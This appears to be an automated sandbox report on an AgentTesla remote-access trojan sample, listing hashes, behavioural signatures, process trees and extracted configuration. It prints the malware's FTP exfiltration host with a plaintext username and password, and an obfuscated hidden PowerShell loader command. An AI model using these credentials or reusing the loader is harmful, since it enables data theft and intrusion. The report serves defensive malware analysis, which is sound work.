Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 16:17
Static task
static1
Behavioral task
behavioral1
Sample
Swift Copy.bat.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Swift Copy.bat.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Overkeenly.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Overkeenly.ps1
Resource
win10v2004-20241007-en
General
-
Target
Swift Copy.bat.exe
-
Size
979KB
-
MD5
411ad554068219f2ed0ce5e74f02d542
-
SHA1
917cc7780771e518c544338e24204471c54ec5fa
-
SHA256
59b03fee31c5c62caac3b05827d210553ce84a6e7c5ae43cb7d34f8242d9bae6
-
SHA512
6dbd1cffd8e580bb8737e00e6c85a63d8092edb2db2028d671241fc1223e58d254a13adfe1ee05574a98be8ec471566bba7d73e2d73d30ba1805d35615c3e090
-
SSDEEP
24576:i/Vwqfj3y6EQ4Dsv+G/9nRn0fyVPiDrNEtEBkvUEZmWwH+EP0R/tF25taZScLvci:0Vwqfj3y6EQ4Dsv+G/910fyVPiDrNEt1
Malware Config
Extracted
Protocol: ftp- Host:
ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Blocklisted process makes network request 4 IoCs
Processes:
msiexec.exeflow pid Process 19 1560 msiexec.exe 22 1560 msiexec.exe 25 1560 msiexec.exe 26 1560 msiexec.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 api.ipify.org 22 api.ipify.org -
Drops file in System32 directory 1 IoCs
Processes:
Swift Copy.bat.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\nonpurchasable.ini Swift Copy.bat.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 1560 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 5052 powershell.exe 1560 msiexec.exe -
Drops file in Windows directory 2 IoCs
Processes:
Swift Copy.bat.exedescription ioc Process File opened for modification C:\Windows\resources\Bondefangeren\hofdamer.for Swift Copy.bat.exe File opened for modification C:\Windows\resources\0409\filbetegnelsernes\ophovnede.fer Swift Copy.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Swift Copy.bat.exepowershell.exemsiexec.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Swift Copy.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exemsiexec.exepid Process 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe 1560 msiexec.exe 1560 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 5052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
powershell.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 5052 powershell.exe Token: SeIncreaseQuotaPrivilege 5052 powershell.exe Token: SeSecurityPrivilege 5052 powershell.exe Token: SeTakeOwnershipPrivilege 5052 powershell.exe Token: SeLoadDriverPrivilege 5052 powershell.exe Token: SeSystemProfilePrivilege 5052 powershell.exe Token: SeSystemtimePrivilege 5052 powershell.exe Token: SeProfSingleProcessPrivilege 5052 powershell.exe Token: SeIncBasePriorityPrivilege 5052 powershell.exe Token: SeCreatePagefilePrivilege 5052 powershell.exe Token: SeBackupPrivilege 5052 powershell.exe Token: SeRestorePrivilege 5052 powershell.exe Token: SeShutdownPrivilege 5052 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeSystemEnvironmentPrivilege 5052 powershell.exe Token: SeRemoteShutdownPrivilege 5052 powershell.exe Token: SeUndockPrivilege 5052 powershell.exe Token: SeManageVolumePrivilege 5052 powershell.exe Token: 33 5052 powershell.exe Token: 34 5052 powershell.exe Token: 35 5052 powershell.exe Token: 36 5052 powershell.exe Token: SeDebugPrivilege 1560 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
Swift Copy.bat.exepowershell.exedescription pid Process procid_target PID 3716 wrote to memory of 5052 3716 Swift Copy.bat.exe 84 PID 3716 wrote to memory of 5052 3716 Swift Copy.bat.exe 84 PID 3716 wrote to memory of 5052 3716 Swift Copy.bat.exe 84 PID 5052 wrote to memory of 1560 5052 powershell.exe 98 PID 5052 wrote to memory of 1560 5052 powershell.exe 98 PID 5052 wrote to memory of 1560 5052 powershell.exe 98 PID 5052 wrote to memory of 1560 5052 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Swift Copy.bat.exe"C:\Users\Admin\AppData\Local\Temp\Swift Copy.bat.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Markgreven=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\bruised\calypsoerne\drikkelaget\Overkeenly.Aut';$Fortykkelsernes=$Markgreven.SubString(3059,3);.$Fortykkelsernes($Markgreven)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
292KB
MD571fc777fd0d8b08ed6a1b1989cc95318
SHA12d2f221507791b9765104d8c2e4f5a2b11cabe32
SHA25601fbdf4dbc1f68eb63e7ddbd2f38ce32878575030857fc1fbdf6701072b540a9
SHA512a837f6e3c95c19021ff908bc584ec9aa9d9503758ba9cea261d9ac75125520801bf73845b0a3434ec55afd818cf68bed560e9238ffc1e05ea9c5cd192c337f61
-
Filesize
55KB
MD5e1aaf4db5b49f5077aa39b8e8ca91243
SHA1f1d68c2d223d1112f80b798a131da9e91c826bce
SHA25676a1f9a4593917cdb08c30b9a444a43a7100fb1332aab4d7a4e335819eeeae55
SHA51280d95f4062e06d0706c070b1071d9ba8ca3fa824532dbd3978cd95405502d48cf81dd2e5c6c329a90ebe8793e2065f22cb5502c510076ca626f6e92f0ba8608a
-
Filesize
39B
MD5e3b7ad34c9d96ee6bb33a7ea9652861f
SHA131414d72fe513f0df1a7348dcd94d183b2168e34
SHA256e4c8aea2ff455ae1d449cfd6105f5fb00b40ee33e96ef3b900a6f12cf7f33b15
SHA51256664fd237e1a885c9631df14d72f0ac35d1b2ee891095fe1c12774fea3849d699122af314cc346b5854e07521b9b3df87d5d35b58949bd7656778b82550547a